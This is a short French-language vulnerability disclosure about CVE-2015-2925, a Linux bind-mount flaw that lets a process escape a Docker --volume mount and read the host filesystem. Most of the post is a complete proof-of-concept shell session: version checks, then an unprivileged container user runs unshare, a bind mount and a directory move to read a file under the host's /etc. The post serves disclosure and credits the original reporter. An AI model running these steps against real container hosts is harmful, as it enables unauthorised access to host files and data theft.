
Docker + CVE-2015-2925 = s'échapper de --volume
Une récente vulnérabilité dans Linux connue depuis environ une demi-année (plusieurs mois publiquement) rendait possible l'évasion des bind mounts. En particulier, dans le cas de Docker, il est possible de s'échapper de l'intérieur du répertoire monté via l'option --volume pour accéder au système de fichiers de l'hôte.
L'équipe de sécurité Docker est déjà informée du problème et a autorisé la publication de cette information afin d'attirer l'attention du public.
Merci à Jann Horn de l'avoir signalé ; en gros, je ne faisais que le reproduire.
Chacune de ces mesures sera suffisante :
# uname -r
3.18.9-aufs
# zgrep USER_NS /proc/config.gz
CONFIG_USER_NS=y
# docker -v
Docker version 1.6.1, build 97cd073
# docker pull debian:jessie
# mkdir /test && chmod 777 /test
# echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
# docker run -i -t --rm -v /test:/test -u nobody debian:jessie
nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
root@fc8925af0f19:/# cd /test
root@fc8925af0f19:/test# mkdir A A/B C D
root@fc8925af0f19:/test# mount --bind A D
root@fc8925af0f19:/test# cd D/B
root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
escaped